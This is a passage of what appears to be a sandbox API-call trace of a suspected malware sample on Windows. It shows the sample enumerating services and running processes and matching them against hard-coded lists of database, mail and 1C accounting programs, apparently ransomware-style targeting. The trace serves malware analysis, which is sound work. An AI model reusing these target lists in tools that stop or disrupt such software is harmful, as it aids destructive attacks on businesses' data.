hHeap=0x5e0000) returned 1 [0264.638] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x661940 | out: hHeap=0x5e0000) returned 1 [0264.638] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0x662d20, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x128 [0265.281] WaitForMultipleObjects (nCount=0x2, lpHandles=0x61bcb0*=0x100, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 83 os_tid = 0x534 Thread: id = 85 os_tid = 0x560 [0265.249] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634a30 [0265.249] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634a30, Size=0x20) returned 0x619bf0 [0265.249] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619bf0, Size=0x40) returned 0x61ac90 [0265.249] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61ac90, Size=0x80) returned 0x65ed30 [0265.249] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x65ed30, Size=0x100) returned 0x630d38 [0265.249] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634a30 [0265.249] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634a30, Size=0x20) returned 0x619bf0 [0265.249] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x619bf0, Size=0x40) returned 0x61ac90 [0265.249] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x61ac90, Size=0x80) returned 0x65ed30 [0265.249] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x65ed30, Size=0x100) returned 0x630e40 [0265.249] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x634a30 [0265.249] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x661940 [0265.249] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634a00 [0265.249] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661940, Size=0x8) returned 0x661970 [0265.249] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x61a278 [0265.249] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661970, Size=0x10) returned 0x634a18 [0265.249] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x61a298 [0265.249] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a) returned 0x619bf0 [0265.249] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634a18, Size=0x20) returned 0x619c18 [0265.249] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x619c40 [0265.250] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x16) returned 0x61a2b8 [0265.250] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a) returned 0x619c68 [0265.250] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x634a18 [0265.250] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x661970 [0265.250] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40) returned 0x61ac90 [0265.250] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661970, Size=0x8) returned 0x661940 [0265.250] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x3c) returned 0x61acd8 [0265.250] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x661940, Size=0x10) returned 0x6349e8 [0265.250] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x61a2d8 [0265.250] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x61a2f8 [0265.250] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6349e8, Size=0x20) returned 0x619c90 [0265.250] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x61dc50 [0265.250] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0265.250] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x630d38 | out: hHeap=0x5e0000) returned 1 [0265.250] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0265.250] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x630e40 | out: hHeap=0x5e0000) returned 1 [0265.250] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x619d58 [0265.269] EnumServicesStatusExW (in: hSCManager=0x619d58, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0) returned 0 [0265.274] GetLastError () returned 0xea [0265.274] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa08) returned 0x63cde0 [0265.275] EnumServicesStatusExW (in: hSCManager=0x619d58, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x63cde0, cbBufSize=0xa08, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x63cde0, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0) returned 1 [0265.533] CloseServiceHandle (hSCObject=0x619d58) returned 1 [0265.560] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0265.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0265.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0265.560] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0265.560] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0265.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0265.560] lstrlenW (lpString="AudioSrv") returned 8 [0265.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0265.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0265.560] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0265.560] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0265.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0265.560] lstrlenW (lpString="BFE") returned 3 [0265.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0265.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0265.560] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0265.560] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0265.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0265.560] lstrlenW (lpString="CscService") returned 10 [0265.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0265.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0265.560] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0265.560] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0265.560] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0265.560] lstrlenW (lpString="DcomLaunch") returned 10 [0265.560] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0265.560] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0265.561] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0265.561] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0265.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0265.561] lstrlenW (lpString="Dhcp") returned 4 [0265.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0265.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0265.561] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0265.561] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0265.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0265.561] lstrlenW (lpString="Dnscache") returned 8 [0265.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0265.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0265.561] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0265.561] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0265.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0265.561] lstrlenW (lpString="eventlog") returned 8 [0265.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0265.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0265.561] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0265.561] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0265.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0265.561] lstrlenW (lpString="EventSystem") returned 11 [0265.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0265.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0265.561] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0265.561] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0265.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0265.561] lstrlenW (lpString="gpsvc") returned 5 [0265.561] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0265.561] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0265.561] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0265.561] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0265.561] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0265.562] lstrlenW (lpString="lmhosts") returned 7 [0265.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0265.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0265.562] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0265.562] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0265.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0265.562] lstrlenW (lpString="MMCSS") returned 5 [0265.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0265.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0265.562] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0265.562] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0265.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0265.562] lstrlenW (lpString="nsi") returned 3 [0265.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0265.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0265.562] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0265.562] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0265.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0265.562] lstrlenW (lpString="PlugPlay") returned 8 [0265.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0265.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0265.562] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0265.562] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0265.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0265.562] lstrlenW (lpString="Power") returned 5 [0265.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0265.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0265.562] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0265.562] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0265.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0265.562] lstrlenW (lpString="ProfSvc") returned 7 [0265.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0265.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0265.562] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0265.563] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0265.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0265.563] lstrlenW (lpString="RpcEptMapper") returned 12 [0265.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0265.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0265.563] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0265.563] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0265.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0265.563] lstrlenW (lpString="RpcSs") returned 5 [0265.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0265.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0265.563] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0265.563] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0265.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0265.563] lstrlenW (lpString="SamSs") returned 5 [0265.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0265.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0265.563] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0265.563] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0265.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0265.563] lstrlenW (lpString="Schedule") returned 8 [0265.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0265.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0265.563] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0265.563] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0265.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0265.563] lstrlenW (lpString="SENS") returned 4 [0265.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0265.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0265.563] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0265.563] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0265.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0265.563] lstrlenW (lpString="ShellHWDetection") returned 16 [0265.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0265.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0265.564] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0265.564] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0265.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0265.564] lstrlenW (lpString="Spooler") returned 7 [0265.564] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0265.564] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0265.564] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0265.564] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0265.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0265.564] lstrlenW (lpString="Themes") returned 6 [0265.564] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0265.564] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0265.564] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0265.564] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0265.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0265.564] lstrlenW (lpString="UxSms") returned 5 [0265.564] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0265.564] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0265.564] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0265.564] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0265.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0265.564] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x63cde0 | out: hHeap=0x5e0000) returned 1 [0265.564] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x130 [0265.566] Process32FirstW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.566] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x48, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0265.566] lstrlenW (lpString="System") returned 6 [0265.566] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0265.566] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0265.566] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0265.566] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0265.566] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0265.566] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0265.566] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0265.566] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0265.567] lstrlenW (lpString="smss.exe") returned 8 [0265.567] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0265.567] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0265.567] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0265.567] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0265.567] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0265.567] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0265.567] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0265.567] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0265.567] lstrlenW (lpString="csrss.exe") returned 9 [0265.567] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0265.567] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0265.567] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0265.567] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0265.567] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0265.567] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0265.567] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0265.567] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0265.567] lstrlenW (lpString="wininit.exe") returned 11 [0265.567] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0265.568] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0265.568] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0265.568] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0265.568] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0265.568] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0265.568] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0265.568] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0265.568] lstrlenW (lpString="csrss.exe") returned 9 [0265.568] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0265.568] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0265.568] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0265.568] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0265.568] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0265.568] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0265.568] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0265.568] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0265.568] lstrlenW (lpString="winlogon.exe") returned 12 [0265.568] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0265.568] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0265.568] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0265.568] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0265.569] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0265.569] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0265.569] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0265.569] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0265.569] lstrlenW (lpString="services.exe") returned 12 [0265.569] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0265.569] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0265.569] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0265.569] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0265.569] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0265.569] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0265.569] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0265.569] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0265.569] lstrlenW (lpString="lsass.exe") returned 9 [0265.569] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0265.569] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0265.569] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0265.569] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0265.569] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0265.569] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0265.570] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0265.570] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0265.570] lstrlenW (lpString="lsm.exe") returned 7 [0265.570] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0265.570] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0265.570] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0265.570] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0265.570] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0265.570] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0265.570] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0265.570] Process32NextW (in: hSnapshot=0x130, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.570] lstrlenW (lpString="svchost.exe") returned 11 [0265.570] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.570] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.570] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.570] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 